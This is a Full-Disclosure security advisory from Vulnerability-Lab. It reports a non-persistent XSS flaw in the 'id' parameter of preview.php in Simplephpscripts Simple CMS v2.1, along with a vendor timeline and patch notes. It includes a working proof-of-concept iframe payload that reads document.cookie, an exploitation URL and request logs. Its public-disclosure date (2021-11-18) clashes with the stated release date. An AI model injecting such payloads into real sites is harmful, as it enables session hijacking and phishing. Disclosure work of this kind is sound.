lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 26 Oct 2021 09:03:34 +0200
From: "info@...nerability-lab.com" <info@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Simplephpscripts Simple CMS v2.1 - XSS Web Vulnerability

Document Title:
===============
Simplephpscripts Simple CMS v2.1 - XSS Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2301


Release Date:
=============
2021-10-18


Vulnerability Laboratory ID (VL-ID):
====================================
2301


Common Vulnerability Scoring System:
====================================
5.1


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.


Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-10-01: Vendor Response/Feedback (Security Department)
2021-10-02: Vendor Fix/Patch (Service Developer Team)
2021-10-10: Security Acknowledgements (Security Department)
2021-11-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre Auth (No Privileges or Session)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A non-persistent cross site scripting vulnerability has been discovered in the official Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to
web-application requests by the client-side.

The cross site scripting vulnerability is located in the `id` parameter of the preview.php file. The request method to inject the malicious
script code is GET and the attack vector of the vulnerability is non-persistent. The execution of the script code occurs in the undefined
exception-handling output message.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Preview (Pages)

Vulnerable File(s):
[+] preview.php

Vulnerable Parameter(s):
[+] id

Affected Module(s):
[+] Undefined Exception-Handling (Preview)


Proof of Concept (PoC):
=======================
The non-persistent web vulnerability can be exploited by remote attackers without user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


PoC: Payload
-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E


PoC: Exploitation
https://simple-cms.localhost:8000/simplecms/preview.php?id=-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E


Vulnerable Source: preview.php (Exception-Handling)
<html>
<head>
<meta charset="utf-8">
<title>Simple CMS page -1>"<iframe src=evil.source onload=alert(document.cookie)></title>
</head>
<body style="margin:0; padding:0;">
<script src="https://simple-cms.localhost:8000/simplecms/lightbox/js/jquery-1.11.0.min.js"></script>
<script src="https://simple-cms.localhost:8000/simplecms/lightbox/js/lightbox.min.js"></script>
<link href="https://simple-cms.localhost:8000/simplecms/lightbox/css/lightbox.css" rel="stylesheet" />
No page content with id -1>"<iframe src=evil.source onload=alert(document.cookie)>
<style type="text/css">
<!--
body {
background-color: <br />
<b>Notice</b>:  Undefined variable: OptionsVis in <b>/home/test/public_html/simplephpscripts/test/simplecms/preview.php</b> on line <b>40</b><br />
;
}
-->
</style>


--- PoC Session Logs (GET) ---
https://simple-cms.localhost:8000/simplecms/preview.php?id=-1>"<iframe src=evil.source onload=alert(document.cookie)>
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=2emae9mm1m1misttrp1a3e1p21
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 1658
content-type: text/html; charset=UTF-8
-
https://simple-cms.localhost:8000/simplecms/evil.source
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/preview.php?id=-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
Cookie: PHPSESSID=2emae9mm1m1misttrp1a3e1p21
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 196
content-type: text/html; charset=iso-8859-1


Reference(s):
https://simple-cms.localhost:8000/simplecms/
https://simple-cms.localhost:8000/simplecms/preview.php
https://simple-cms.localhost:8000/simplecms/preview.php?id=


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ